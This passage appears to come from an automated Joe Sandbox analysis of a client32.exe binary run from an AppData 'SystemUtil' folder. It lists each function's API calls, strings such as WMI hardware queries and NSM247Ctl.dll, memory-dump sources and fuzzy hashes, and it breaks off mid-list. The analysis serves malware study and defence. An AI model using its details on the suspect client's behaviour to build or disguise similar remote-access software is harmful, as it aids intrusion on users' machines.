                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: InitializeObjectSingleUninitializeWait
                                                                                                                                                                                                    • String ID: PCSystemTypeEx$Win32_ComputerSystem
                                                                                                                                                                                                    • API String ID: 2994556011-578995875
                                                                                                                                                                                                    • Opcode ID: cb70902765e9df780483309619877a5cdd6fdcad1f0a8482e579a40db52188bc
                                                                                                                                                                                                    • Instruction ID: 2dfd674cbcced21787933601e0fbf0765c8f89b6bf193c9c24077654eb832309
                                                                                                                                                                                                    • Opcode Fuzzy Hash: cb70902765e9df780483309619877a5cdd6fdcad1f0a8482e579a40db52188bc
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D62129B1E006669BDF11CBA0CC44B6EB7E89F45358F1000B5FC58DA2C8FAB8E940D791
                                                                                                                                                                                                    Function 11140870 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 11140290: GetCurrentProcess.KERNEL32(00000000,?,111404E3,?), ref: 1114029C
                                                                                                                                                                                                      • Part of subcall function 11140290: GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\SystemUtil\client32.exe,00000104,?,111404E3,?), ref: 111402B9
                                                                                                                                                                                                    • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 111408C5
                                                                                                                                                                                                    • ResetEvent.KERNEL32(00000254), ref: 111408D9
                                                                                                                                                                                                    • SetEvent.KERNEL32(00000254), ref: 111408EF
                                                                                                                                                                                                    • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 111408FE
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: EventMultipleObjectsWait$CurrentFileModuleNameProcessReset
                                                                                                                                                                                                    • String ID: MiniDump
                                                                                                                                                                                                    • API String ID: 1494854734-2840755058
                                                                                                                                                                                                    • Opcode ID: b5093043549d72af129595f684cc28810df42538d39778bc18dae4ac23f44b08
                                                                                                                                                                                                    • Instruction ID: 82be7c26d502f028142b998fa5126df4c28d1bc7d262cc6800bde2f36eb64e35
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b5093043549d72af129595f684cc28810df42538d39778bc18dae4ac23f44b08
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F311D675E0022667F700DFE9CC81F9AB7689B05B68F214234F624E66C4E761A5418BA5
                                                                                                                                                                                                    Function 11017440 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 70synchronizationCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(000002F0,000000FF), ref: 11017472
                                                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 1101747B
                                                                                                                                                                                                    • CoUninitialize.COMBASE(00000001,?,?), ref: 11017500
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: InitializeObjectSingleUninitializeWait
                                                                                                                                                                                                    • String ID: ChassisTypes$Win32_SystemEnclosure
                                                                                                                                                                                                    • API String ID: 2994556011-2037925671
                                                                                                                                                                                                    • Opcode ID: f0ded35296c55d0866425beafa263bb65a3590a39d35365136548dea7fc607f2
                                                                                                                                                                                                    • Instruction ID: d4ceec51b3d1aeb93fa2206dcf0162908bfa0d380c5fa1549f26343d1b5ce827
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f0ded35296c55d0866425beafa263bb65a3590a39d35365136548dea7fc607f2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 29213575D406655BDB12CBA4CC45BAEBBED9F84358F0000A4EC58DB288EF39D900C761
                                                                                                                                                                                                    Function 1102CD10 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 64COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D
                                                                                                                                                                                                    • SetEvent.KERNEL32(?,Client,DisableGeolocation,00000000,00000000,24DE4E77,?,?,?,Function_00186DCB,000000FF), ref: 1102CDC7
                                                                                                                                                                                                      • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                                                                                      • Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
                                                                                                                                                                                                      • Part of subcall function 1110C520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EEC3F0,?,1110D1BD,00000000,00000001,?,?,?,000000FF,?,11026F57), ref: 1110C53E
                                                                                                                                                                                                    • CreateEventA.KERNEL32 ref: 1102CD8A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Event$Create$__wcstoi64_memsetwsprintf
                                                                                                                                                                                                    • String ID: (r$Client$DisableGeolocation
                                                                                                                                                                                                    • API String ID: 2598271332-1772389313
                                                                                                                                                                                                    • Opcode ID: 63dd30d7ff77dec508e51da4baa18de7bde6bf43051e4c425e199e23d5428a19
                                                                                                                                                                                                    • Instruction ID: 9819fa70e1002b3fd3fc9294db2adb66ebff135fc09b7afae45472fde2869809
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 63dd30d7ff77dec508e51da4baa18de7bde6bf43051e4c425e199e23d5428a19
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BA21E474E41765ABE711CFD4CD46FAABBE5E708B08F0042AAF9159B3C0E7B574008B84
                                                                                                                                                                                                    Function 68598E28 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 64COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 68595000: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 68595014
                                                                                                                                                                                                      • Part of subcall function 68595000: K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,68598E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 68595034
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,?,00000FA0,?), ref: 68598EAE
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 68598EBF
                                                                                                                                                                                                      • Part of subcall function 68592420: _strrchr.LIBCMT ref: 6859242E
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097286216.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097266710.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097341613.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097364193.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097364193.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097405518.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressCloseFileFreeHandleLibraryModuleNameProc_strrchr
                                                                                                                                                                                                    • String ID: NSM247Ctl.dll$Set Is247=%d$pcictl_247.dll
                                                                                                                                                                                                    • API String ID: 3215810784-3459472706
                                                                                                                                                                                                    • Opcode ID: 0c1eb459a09f90f08b246fdc623d0ac87a7dfdcf7a84f62f4c546c9f912fbc31
                                                                                                                                                                                                    • Instruction ID: 2e7df5cad1e1d205e57a65cd7d462213f867fb545e006c7e25943846b542b7cb
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0c1eb459a09f90f08b246fdc623d0ac87a7dfdcf7a84f62f4c546c9f912fbc31
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6111C879A801559FEF10DA55DC51BFEB364EB45305FC00455EE2DE3240EB319E44CB66
                                                                                                                                                                                                    Function 111433B0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadStringA.USER32(00000000,?,?,00000400), ref: 111433DF
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 11143416
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: wsprintf$ErrorExitLastLoadMessageProcessString
                                                                                                                                                                                                    • String ID: #%d$..\ctl32\util.cpp$i < _tsizeof (buf)
                                                                                                                                                                                                    • API String ID: 1985783259-2296142801
                                                                                                                                                                                                    • Opcode ID: ff2748ac2aec15e09c4bdc6ca979aa6eb9a6b499c93e777d6c60cf8ab22b526a
                                                                                                                                                                                                    • Instruction ID: c1d41daf5ac04f5e509db8cc8d6ef6429d5cf2497d86e7a71f1ea6c6f60715f8
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ff2748ac2aec15e09c4bdc6ca979aa6eb9a6b499c93e777d6c60cf8ab22b526a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2411E5FAE01228A7C711CAA59D80FEEF77C9B45708F544065FB08B3181EA30AA0587A4
                                                                                                                                                                                                    Function 110312C0 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 78COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 11031376
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: wsprintf$ErrorExitLastMessageProcess
                                                                                                                                                                                                    • String ID: %s%s.bin$305090$clientinv.cpp$m_pDoInv == NULL
                                                                                                                                                                                                    • API String ID: 4180936305-1644303538
                                                                                                                                                                                                    • Opcode ID: a91a351a66afc442ede38cb242442a1426f20364587f5a7d661eb96a4c7a4840
                                                                                                                                                                                                    • Instruction ID: 6dff70f8b624139b5d8b9928b76f3118b4df96bcfaa22522713f30a32685b050
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a91a351a66afc442ede38cb242442a1426f20364587f5a7d661eb96a4c7a4840
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4D2181B5E00705AFD710DF65DC80BAAB7E4EB88758F10857DF825D7681E734A8008B55
                                                                                                                                                                                                    Function 11140CE0 Relevance: 7.6, APIs: 5, Instructions: 66COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(111413B8,00000000,?,111413B8,00000000), ref: 11140CFC
                                                                                                                                                                                                    • __strdup.LIBCMT ref: 11140D17
                                                                                                                                                                                                      • Part of subcall function 11080BE0: _strrchr.LIBCMT ref: 11080BEE
                                                                                                                                                                                                      • Part of subcall function 11140CE0: _free.LIBCMT ref: 11140D3E
                                                                                                                                                                                                    • _free.LIBCMT ref: 11140D4C
                                                                                                                                                                                                      • Part of subcall function 1115F3B5: HeapFree.KERNEL32(00000000,00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3CB
                                                                                                                                                                                                      • Part of subcall function 1115F3B5: GetLastError.KERNEL32(00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3DD
                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(111413B8,00000000,?,?,?,111413B8,00000000), ref: 11140D57
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _free$AttributesCreateDirectoryErrorFileFreeHeapLast__strdup_strrchr
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 398584587-0
                                                                                                                                                                                                    • Opcode ID: 34ccee2d3f085fefe18343751ca6447c68098570c0016434bf78a5f48bb9111b
                                                                                                                                                                                                    • Instruction ID: 9875b16ed77e9f13dc3c5425d13c9245bbbda80c09f4107d02f4537b9d4f833e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 34ccee2d3f085fefe18343751ca6447c68098570c0016434bf78a5f48bb9111b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9101F53B6042161AF301157E6D01BEFBB9C8BC2B6CF284176E98DC6585F756F41A82A2
                                                                                                                                                                                                    Function 1100EC70 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 1100ECA2
                                                                                                                                                                                                      • Part of subcall function 1115CFF4: _setlocale.LIBCMT ref: 1115D006
                                                                                                                                                                                                    • _free.LIBCMT ref: 1100ECB4
                                                                                                                                                                                                      • Part of subcall function 1115F3B5: HeapFree.KERNEL32(00000000,00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3CB
                                                                                                                                                                                                      • Part of subcall function 1115F3B5: GetLastError.KERNEL32(00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3DD
                                                                                                                                                                                                    • _free.LIBCMT ref: 1100ECC7
                                                                                                                                                                                                    • _free.LIBCMT ref: 1100ECDA
                                                                                                                                                                                                    • _free.LIBCMT ref: 1100ECED
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
